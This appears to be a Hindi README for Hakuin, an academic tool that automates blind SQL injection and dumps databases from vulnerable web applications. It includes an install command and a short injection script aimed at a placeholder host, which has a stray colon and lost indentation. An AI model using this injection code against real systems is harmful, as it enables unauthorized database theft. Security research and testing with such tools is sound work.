
एक बेहद तेज़ और पूरी तरह से कॉन्फ़िगरेबल Blind SQL Injection ऑप्टिमाइज़ेशन और ऑटोमेशन फ्रेमवर्क।
Hakuin एक ब्लाइंड SQL इंजेक्शन (BSQLI) ऑप्टिमाइज़ेशन और ऑटोमेशन फ्रेमवर्क है जो Python 3 में लिखा गया है। यह एक्सट्रैक्शन लॉजिक को एब्स्ट्रैक्ट करता है और उपयोगकर्ताओं को कमजोर वेब एप्लिकेशनों से आसानी से और कुशलता से डेटाबेस डंप करने की अनुमति देता है। प्रक्रिया को तेज करने के लिए, Hakuin विभिन्न ऑप्टिमाइज़ेशन विधियों का उपयोग करता है, जिनमें प्री-ट्रेंड और अनुकूली भाषा मॉडल, अवसरवादी अनुमान, सांख्यिकीय मॉडलिंग, समानांतरता, टर्नरी क्वेरी और बहुत कुछ शामिल हैं।
Hakuin को प्रतिष्ठित शैक्षणिक और औद्योगिक सम्मेलनों में प्रस्तुत किया गया है:
अधिक जानकारी हमारे paper और slides में पाई जा सकती है।
Hakuin को स्थापित करने के लिए, बस चलाएँ:
pip3 install hakuin
Hakuin एक सहज टूल के साथ आता है जो Hakuin की अधिकांश सुविधाओं को सीधे कमांड लाइन से प्रदान करता है:
hk -h
कभी-कभी, BSQLI कमजोरियां कमांड लाइन से शोषण करने के लिए बहुत पेचीदा होती हैं और कस्टम स्क्रिप्टिंग की आवश्यकता होती है। यह वह जगह है जहाँ Hakuin चमकता है, जो आपको बिल्कुल सब कुछ अनुकूलित करने की अनुमति देता है - इंजेक्शन लॉजिक, अनुमान लॉजिक, और यहाँ तक कि क्वेरी भी।
यहाँ एक न्यूनतम उदाहरण है:
import asyncio
import aiohttp
from hakuin import Extractor, Requester
class SimpleRequester(Requester):
async def request(self, query, ctx):
payload = query.render(ctx)
url = f'http://target.com/users?search=XXX" OR ({payload})--'
async with aiohttp.request('GET', url) as resp:
return resp.status == 200
async def main():
requester = SimpleRequester():
ext = Extractor(requester=requester, dbms='sqlite')
data = await ext.extract_table_names()
print(data)
asyncio.run(main())
हमारे tutorial को अवश्य देखें।
यह रिपॉजिटरी सुरक्षा चिकित्सकों की आवश्यकताओं को पूरा करने के लिए सक्रिय रूप से विकसित की जा रही है। हमारे पेपर में वर्णित प्रयोगों को दोहराने के इच्छुक शोधकर्ताओं को frozen version स्थापित करना चाहिए क्योंकि इसमें मूल कोड, प्रयोग स्क्रिप्ट और परिणामों को पुन: प्रस्तुत करने के लिए एक निर्देश मैनुअल शामिल है।
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}